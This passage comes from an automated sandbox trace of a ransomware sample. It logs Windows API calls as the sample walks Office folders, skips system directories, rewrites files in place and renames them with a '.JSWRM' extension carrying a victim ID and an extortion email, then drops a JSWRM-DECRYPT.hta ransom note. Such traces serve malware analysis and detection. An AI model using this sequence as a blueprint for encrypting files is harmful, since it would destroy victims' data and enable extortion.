lpNumberOfBytesRead=0x345e89c*=0x3ed0, lpOverlapped=0x0) returned 1 [0113.679] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.679] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3ed0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3ed0, lpOverlapped=0x0) returned 1 [0113.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.679] CloseHandle (hObject=0x238) returned 1 [0113.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0113.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0113.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0113.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0113.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0113.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0113.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.680] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CollectSignatures_Init.xsn" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\collectsignatures_init.xsn"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CollectSignatures_Init.xsn.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\collectsignatures_init.xsn.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0113.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0113.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0113.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0113.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0113.681] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x99dfc61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99dfc61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99dfc61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x401b, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="CollectSignatures_Sign.xsn", cAlternateFileName="COLLEC~1.XSN")) returned 1 [0113.681] lstrcmpiW (lpString1="CollectSignatures_Sign.xsn", lpString2=".") returned 1 [0113.681] lstrcmpiW (lpString1="CollectSignatures_Sign.xsn", lpString2="..") returned 1 [0113.681] lstrcmpiW (lpString1="CollectSignatures_Sign.xsn", lpString2="...") returned 1 [0113.681] lstrcmpiW (lpString1="CollectSignatures_Sign.xsn", lpString2="windows") returned -1 [0113.681] lstrcmpiW (lpString1="CollectSignatures_Sign.xsn", lpString2="recovery") returned -1 [0113.681] lstrcmpiW (lpString1="CollectSignatures_Sign.xsn", lpString2="perflogs") returned -1 [0113.681] lstrcmpiW (lpString1="CollectSignatures_Sign.xsn", lpString2="documents and settings") returned -1 [0113.681] lstrcmpiW (lpString1="CollectSignatures_Sign.xsn", lpString2="$RECYCLE.BIN") returned 1 [0113.681] lstrcmpiW (lpString1="CollectSignatures_Sign.xsn", lpString2="system volume information") returned -1 [0113.681] lstrcmpiW (lpString1="CollectSignatures_Sign.xsn", lpString2="msocache") returned -1 [0113.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0113.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CollectSignatures_Sign.xsn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0113.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0113.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CollectSignatures_Sign.xsn", cchWideChar=26, lpMultiByteStr=0x240f48, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CollectSignatures_Sign.xsn", lpUsedDefaultChar=0x0) returned 26 [0113.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0113.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0113.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CollectSignatures_Sign.xsn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0113.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0113.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CollectSignatures_Sign.xsn", cchWideChar=26, lpMultiByteStr=0x241268, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CollectSignatures_Sign.xsn", lpUsedDefaultChar=0x0) returned 26 [0113.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0113.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0113.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0113.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0113.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CollectSignatures_Sign.xsn" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\collectsignatures_sign.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.682] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16411) returned 1 [0113.682] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4010) returned 0x24c1d0 [0113.682] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4010, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x4010, lpOverlapped=0x0) returned 1 [0113.685] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.685] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x4010, lpOverlapped=0x0) returned 1 [0113.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.685] CloseHandle (hObject=0x238) returned 1 [0113.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0113.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0113.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0113.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0113.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0113.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0113.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.686] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CollectSignatures_Sign.xsn" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\collectsignatures_sign.xsn"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CollectSignatures_Sign.xsn.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\collectsignatures_sign.xsn.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0113.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0113.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0113.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0113.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0113.687] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x99b9a24, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99b9a24, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99b9a24, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17b5, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="CT_ROOTS.XML", cAlternateFileName="")) returned 1 [0113.687] lstrcmpiW (lpString1="CT_ROOTS.XML", lpString2=".") returned 1 [0113.687] lstrcmpiW (lpString1="CT_ROOTS.XML", lpString2="..") returned 1 [0113.687] lstrcmpiW (lpString1="CT_ROOTS.XML", lpString2="...") returned 1 [0113.687] lstrcmpiW (lpString1="CT_ROOTS.XML", lpString2="windows") returned -1 [0113.687] lstrcmpiW (lpString1="CT_ROOTS.XML", lpString2="recovery") returned -1 [0113.687] lstrcmpiW (lpString1="CT_ROOTS.XML", lpString2="perflogs") returned -1 [0113.687] lstrcmpiW (lpString1="CT_ROOTS.XML", lpString2="documents and settings") returned -1 [0113.687] lstrcmpiW (lpString1="CT_ROOTS.XML", lpString2="$RECYCLE.BIN") returned 1 [0113.687] lstrcmpiW (lpString1="CT_ROOTS.XML", lpString2="system volume information") returned -1 [0113.687] lstrcmpiW (lpString1="CT_ROOTS.XML", lpString2="msocache") returned -1 [0113.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0113.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CT_ROOTS.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CT_ROOTS.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CT_ROOTS.XML", lpUsedDefaultChar=0x0) returned 12 [0113.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0113.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0113.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CT_ROOTS.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CT_ROOTS.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CT_ROOTS.XML", lpUsedDefaultChar=0x0) returned 12 [0113.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0113.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0113.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0113.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0113.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CT_ROOTS.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\ct_roots.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.689] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6069) returned 1 [0113.689] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17b0) returned 0x24c1d0 [0113.689] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x17b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x17b0, lpOverlapped=0x0) returned 1 [0113.690] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.691] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x17b0, lpOverlapped=0x0) returned 1 [0113.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.691] CloseHandle (hObject=0x238) returned 1 [0113.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0113.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0113.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0113.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0113.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0113.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.691] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CT_ROOTS.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\ct_roots.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CT_ROOTS.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\ct_roots.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0113.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0113.692] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1697068, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x99937c0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99937c0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="DataServices", cAlternateFileName="DATASE~1")) returned 1 [0113.692] lstrcmpiW (lpString1="DataServices", lpString2=".") returned 1 [0113.692] lstrcmpiW (lpString1="DataServices", lpString2="..") returned 1 [0113.692] lstrcmpiW (lpString1="DataServices", lpString2="...") returned 1 [0113.692] lstrcmpiW (lpString1="DataServices", lpString2="windows") returned -1 [0113.692] lstrcmpiW (lpString1="DataServices", lpString2="recovery") returned -1 [0113.692] lstrcmpiW (lpString1="DataServices", lpString2="perflogs") returned -1 [0113.692] lstrcmpiW (lpString1="DataServices", lpString2="documents and settings") returned -1 [0113.692] lstrcmpiW (lpString1="DataServices", lpString2="$RECYCLE.BIN") returned 1 [0113.692] lstrcmpiW (lpString1="DataServices", lpString2="system volume information") returned -1 [0113.692] lstrcmpiW (lpString1="DataServices", lpString2="msocache") returned -1 [0113.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0113.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0113.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0113.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0113.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0113.693] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\jswrm-decrypt.hta")) returned 0xffffffff [0113.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0113.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0113.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0113.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0113.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0113.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0113.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.697] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.698] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0113.699] CloseHandle (hObject=0x238) returned 1 [0113.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0113.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0113.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0113.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0113.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0113.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0113.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0113.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\jswrm-decrypt.hta")) returned 0x20 